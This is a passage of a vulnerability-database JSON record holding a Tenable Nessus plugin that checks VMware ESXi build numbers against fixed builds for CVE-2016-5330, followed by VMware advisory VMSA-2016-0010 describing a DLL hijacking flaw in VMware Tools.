mitigate\nCVE-2016-5330.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-5330\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'DLL Side Loading Vulnerability in VMware Host Guest Client Redirector');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", 
value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/03/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/08/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esxi\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_vsphere_detect.nbin\");\n script_require_keys(\"Host/VMware/version\", \"Host/VMware/release\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nfixes = make_array(\n '5.0', '3982828',\n '5.1', '3872664',\n '5.5', '4179633',\n '6.0', '3620759'\n);\n\nsecurity_only_patches = make_array(\n '5.0', '3982819',\n '5.1', '3872638',\n '5.5', '4179631',\n '6.0', '3568943'\n);\n\nrel = get_kb_item_or_exit(\"Host/VMware/release\");\nif (\"ESXi\" >!< rel) audit(AUDIT_OS_NOT, \"ESXi\");\n\nver = get_kb_item_or_exit(\"Host/VMware/version\");\n\nmatch = pregmatch(pattern:\"^ESXi? 
([0-9]+\\.[0-9]+).*$\", string:ver);\nver = match[1];\n\nif (ver != '5.0' && ver != '5.1' && ver != '5.5' && ver != '6.0')\n audit(AUDIT_OS_NOT, \"ESXi 5.0 / 5.1 / 5.5 / 6.0\");\n\nfixed_build = fixes[ver];\nsecurity_only_patch = security_only_patches[ver];\n\nif (empty_or_null(fixed_build)) audit(AUDIT_VER_FORMAT, ver);\n\nmatch = pregmatch(pattern:'^VMware ESXi.*build-([0-9]+)$', string:rel);\nif (isnull(match)) audit(AUDIT_UNKNOWN_BUILD, \"VMware ESXi\", \"5.0 / 5.1 / 5.5 / 6.0\");\n\nbuild = int(match[1]);\n\nif (build < fixed_build && build != security_only_patch)\n{\n if (!isnull(security_only_patch))\n fixed_build += ' / ' + security_only_patch + ' (security-only fix)';\n\n report = '\\n ESXi version : ' + ver +\n '\\n Installed build : ' + build +\n '\\n Fixed build : ' + fixed_build +\n '\\n';\n\n security_report_v4(port:0, severity:SECURITY_WARNING, extra:report);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"VMware ESXi\", ver + \" build \" + build);\n", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}], "vmware": [{"lastseen": "2019-11-06T16:05:29", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5331", "CVE-2016-5330"], "description": "**a. DLL hijacking issue in Windows-based VMware Tools**\n\nA DLL hijacking vulnerability is present in the VMware Tools \"Shared Folders\" (HGFS) feature running on Microsoft Windows. Exploitation of this issue may lead to arbitrary code execution with the privileges of the victim. In order to exploit this issue, the attacker would need write access to a network share and they would need to entice the local user into opening their document. \n\nThere are no known workarounds for this issue. \n\nVMware would like to thank Yorick Koster of [Securify B.V.](<https://securify.nl>) for reporting this issue to us. \n\nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the identifier CVE-2016-5330 to this issue. 
\n\nColumn 5 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available. \n\n", "edition": 4, "modified": "2016-09-19T00:00:00", "published": "2016-08-04T00:00:00", "id": "VMSA-2016-0010", "href": "https://www.vmware.com/security/advisories/VMSA-2016-0010.html", "title": "VMware product updates address multiple security issues", "type": "vmware", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}]}